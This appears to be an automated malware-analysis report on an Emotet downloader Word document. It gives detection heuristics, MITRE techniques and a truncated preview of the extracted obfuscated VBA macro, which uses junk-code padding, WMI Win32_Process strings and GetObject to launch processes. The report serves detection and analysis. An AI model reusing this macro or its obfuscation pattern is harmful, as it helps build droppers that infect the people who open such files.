MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6865934-0', strongly suggesting the Emotet family. Heuristics indicate the presence of a legacy WordBasic auto-exec macro ('autoopen') and a VBA 'GetObject' call, which is commonly used to download and execute additional malicious content. The VBA script itself is heavily obfuscated, but the presence of auto-execution and the GetObject call points to a downloader functionality.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6865934-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6865934-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41268 bytes |
SHA-256: a79f6054d5c0d65eb02a252f083ad7f1964106a1ecf501cfaa621e60bfb6bc2e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "a7880266"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "C840010"
Function s3148_()
Select Case R1566_
Case 516838731
m__285 = (j87807_8 * Fix(296178247 / CBool(o115_1))) - C13_37 / Oct(293393407) / 630377197 + CStr(I_558_23) - 660671192 + ChrB(X_19883)
End Select
Select Case p93_382
Case 77420656
i48054 = (Y1644314 * Fix(774667045 / CBool(f4349_))) - I52_120 / Oct(529354408) / 90262237 + CStr(i8450_) - 168691378 + ChrB(z___5_3)
End Select
Select Case u__60_8_
Case 30235116
U409_695 = (B490_4 * Fix(19556864 / CBool(Q392_258))) - D6_5_622 / Oct(728609941) / 106099904 + CStr(z70__30) - 733617483 + ChrB(i408_2_)
End Select
Select Case k670_6_
Case 647821167
i24_71 = (X8_800_4 * Fix(896535262 / CBool(J3__73))) - V__123 / Oct(319038763) / 336902251 + CStr(r21_55) - 571729712 + ChrB(n__87_)
End Select
Select Case O7_7_331
Case 162329689
I2_353 = (k_1_4_ * Fix(2283938 / CBool(J83_2_1_))) - H27426 / Oct(305651347) / 118717102 + CStr(d0_86__) - 272478045 + ChrB(h_06_988)
End Select
Select Case U_41__7
Case 698753536
k3_6382_ = (W_51400 * Fix(453048743 / CBool(v__89_06))) - X72467 / Oct(196484666) / 810741272 + CStr(f147387) - 282946352 + ChrB(K1____)
End Select
Select Case a__00_9
Case 203337892
j3921__ = (z__67_ * Fix(454390916 / CBool(p16_064))) - u18_5__ / Oct(268298586) / 543508811 + CStr(n57302_0) - 563238546 + ChrB(N91652_8)
End Select
End Function
Function l0_1__(o7_572_, Q__632__)
On Error Resume Next
Select Case M1__0_9
Case 49615010
M_7_311 = (H_4_28 * Fix(988689433 / CBool(K30484))) - T_88_99 / Oct(149282066) / 503026093 + CStr(z619690) - 592631230 + ChrB(m3087_)
End Select
Select Case Z678_9
Case 19993843
i_7952 = (k3_3_9 * Fix(413919346 / CBool(j73___))) - t2_0_168 / Oct(96083708) / 331985542 + CStr(n322_88_) - 917373509 + ChrB(D58_898_)
End Select
i253_50_ = X159_269 + "winmgmts:Win32" + s47661 + "_ProcessStartup" + M2_65_
Select Case i6_9945
Case 675298117
u34_959 = (k__5_51 * Fix(652825974 / CBool(v0140_))) - P_621_ / Oct(880846215) / 835072291 + CStr(l273__8) - 597682159 + ChrB(F59946)
End Select
Select Case P_3_4642
Case 723758910
E7__3_ = (d3_128 * Fix(150904099 / CBool(M36__0))) - o3886_ / Oct(513302008) / 694092139 + CStr(C_2854) - 619347939 + ChrB(b_24291)
End Select
Select Case I0____46
Case 678729379
m_15_35 = (j8306_ * Fix(580591602 / CBool(H1746_49))) - a517_148 / Oct(393622825) / 977817913 + CStr(f365085) - 465139037 + ChrB(X680_8)
End Select
j40_1__ = F965_0 + "winmgmts:Win32" + j373_5 + "_Process" + O_25_51
Select Case a608888_
Case 943495683
U_26_315 = (q08380_ * Fix(822252679 / CBool(V970_9_9))) - z818_45 / Oct(27061879) / 974788942 + CStr(M780_25) - 962437839 + ChrB(C__8_87)
End Select
Select Case z__1660
Case 777063855
z3984_3 = (P_4___ * Fix(598179275 / CBool(f59545))) - V065_8_ / Oct(106471359) / 909233529 + CStr(K_5125_) - 551170688 + ChrB(r2_693)
End Select
Select Case C_90_4_
Case 813565636
f52_22_ = (F33_2_2_ * Fix(76797393 / CBool(b__26043))) - Y03_138_ / Oct(284062389) / 174184373 + CStr(R_4__8) - 929465842 + ChrB(h272_51)
End Select
Set S04___ = GetObject(W57640 + i253_50_ + Q6___63)
Select Case D_25324
Case 657663429
Z_82793 = (G1__06 * Fix(120492041 / CBool(O__069))) - N_7299_ / Oct(382100021) / 960712356 + CStr(Q1660__5) - 226287301 + ChrB(w242699)
End Select
Select Case M_58__9
Case 933067159
C4_6_21 = (s_48_9 * Fix(795652300 / CBool(s868_0))) - H373770 / Oct(781117956) / 934453172 + CStr(V9_34__) - 791343344 + ChrB(X__991)
End Select
Select Case D59_03_
Case 539910223
Y361266 = (i_02_1_ * Fix(321892653 / CBool(F27__66))) - d6_176_7 / Oct(155155024) / 366
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.